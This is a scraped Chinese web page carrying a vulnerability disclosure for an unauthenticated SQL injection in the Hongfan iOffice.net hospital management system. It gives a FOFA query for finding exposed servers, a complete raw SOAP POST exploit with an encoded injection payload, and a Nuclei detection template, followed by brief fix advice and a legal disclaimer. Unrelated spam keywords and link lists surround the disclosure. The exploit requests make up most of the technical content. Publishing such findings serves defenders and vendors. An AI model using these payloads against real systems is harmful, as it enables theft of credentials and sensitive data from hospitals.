当前位置: 首页 > news >正文

做电影网站技术大型网站的空间

做电影网站技术,大型网站的空间,做搜狗网站排名首页,厦门谁需要网站建设【产品漏洞简述】 红帆iOffice.net从最早满足医院行政办公需求#xff08;传统OA#xff09;#xff0c;到目前融合了卫生主管部门的管理规范和众多行业特色应用#xff0c;是目前唯一定位于解决医院综合业务管理的软件#xff0c;是最符合医院行业特点的医院综…【产品漏洞简述】 红帆iOffice.net从最早满足医院行政办公需求传统OA到目前融合了卫生主管部门的管理规范和众多行业特色应用是目前唯一定位于解决医院综合业务管理的软件是最符合医院行业特点的医院综合业务管理平台是成功案例最多的医院综合业务管理软件。 红帆iOffice.net wssRtSyn.asmx接口处存在SQL注入漏洞未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证最终可能导致服务器失陷。 【资产测绘Query】 app红帆-ioffice 【产品界面】 【poc】 POST /iOffice/prg/set/wss/wssRtSyn.asmx HTTP/1.1Host: your-ipUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36Content-Type: text/xmlAccept: text/html,application/xhtmlxml,application/xml;q0.9,*/*;q0.8Accept-Encoding: gzip,deflateConnection: Keep-alive?xml version1.0?soap:Envelope xmlns:soaphttp://schemas.xmlsoap.org/soap/envelope/ xmlns:tnshttp://iOffice.net/iOffice/ioRtSynsoap:Header /soap:Bodytns:SubmitLogInfotns:dataqwe/tns:datatns:ServerHost1(SELECT CHAR(103)CHAR(105)CHAR(75)CHAR(83) WHERE 66216621 AND 7795 IN (SELECT (CHAR(113)CHAR(118)CHAR(106)CHAR(122)CHAR(113)(SELECT version)CHAR(113)CHAR(118)CHAR(113)CHAR(120)CHAR(113))))/tns:ServerHost/tns:SubmitLogInfo/soap:Body/soap:Envelope 【Nuclei-Poc验证】 id: hongfan-iOffice-wssRtSyn-sqliinfo:name: 红帆iOffice.net wssRtSyn接口处存在SQL注入漏洞author: 王阿姨介绍的severity: criticaldescription: 红帆iOffice.net wssRtSyn接口处存在SQL注入漏洞未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证最终可能导致服务器失陷。reference:metadata:verified: truemax-request: 1fofa-query: FOFA:app红帆-iofficetags: sqlirequests:- raw:- |POST /iOffice/prg/set/wss/ioDesktopData.asmx HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0Accept: text/html,application/xhtmlxml,application/xml;q0.9,*/*;q0.8Accept-Language: zh-CN,zh;q0.8,en-US;q0.5,en;q0.3Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1SOAPAction: http://tempuri.org/GetDepScheduleContent-Type: text/xml;charsetUTF-8soap:Envelope xmlns:soaphttp://www.w3.org/2003/05/soap-envelope xmlns:temhttp://tempuri.org/soap:Header/soap:Bodytem:GetDepSchedule!--type: string--tem:EmpLoginID1(SELECT CHAR(103)CHAR(105)CHAR(75)CHAR(83) WHERE 66216621 AND 7795 IN (SELECT (CHAR(113)CHAR(118)CHAR(106)CHAR(122)CHAR(113)(SELECT version)CHAR(113)CHAR(118)CHAR(113)CHAR(120)CHAR(113))))/tem:EmpLoginID/tem:GetDepSchedule/soap:Body/soap:Envelopematchers-condition: andmatchers:- type: wordpart: bodywords:- SQL Server- Systemcondition: and- type: statusstatus:- 500 【修复建议】 1、请联系厂商进行修复。 2、如非必要禁止公网访问该系统。 3、设置白名单访问。 申明本账号所分享内容仅用于网络安全技术讨论切勿用于违法途径所有渗透都需获取授权违者后果自行承担与本号及作者无关请谨记守法。
http://www.hkea.cn/news/14261609/

相关文章:

  • 网站顺序vs连接数据库做网站
  • 网站建设中英文版做响应式网站设计师需要做什么
  • 高明铝业网站建站wordpress hsts
  • seo网站营销怎么自己做三个一网站
  • 圣诞树html网页代码南京网站seo专家
  • 我想做个卷帘门网站怎么做青山seo排名公司
  • 做网站赚广告费好做吗wordpress添加站点
  • 付费的网站是指jsp网站开发小程序
  • 渠道建设网站网页小游戏修改器
  • 网上做广告的网站美食网站怎样做蛋挞
  • 网站被篡改处理网站建设的工作总结
  • 唯品会网站建设去成都需要隔离吗
  • 仙踪林老狼网站欢迎您拍照360建站工具
  • 富阳网站建设推广企业融资方式
  • 合肥网站开发建设深圳开发网站建设哪家好
  • 施工合同在哪个建设网站下载做网站用windows还是linux
  • 部署wordpress站点做电子相册的网站
  • 广告公司网站建设费用网站建设实践鉴定
  • 南沙网站建设wwiwevernote wordpress
  • 济南网站建设选聚搜网络一x有哪些网站建设公司上线
  • 上传文章网站如何快速制作一个网站
  • 网站关键字统计营销比较成功的品牌
  • 西安免费网站制作wordpress移动端导航栏
  • 河南住房和城乡建设厅网站首页百度收录入口查询注意事项
  • 网站开发团队要几个人长沙营销推广公司
  • 福州网站运营沐川移动网站建设
  • 工会网站升级改造建设方案百度搜索量
  • 天津网站建设制作排名软件开发前端和后端
  • 点卡平台网站开发怎样做网站xml
  • 广西建设局网站首页无锡网站建设 微信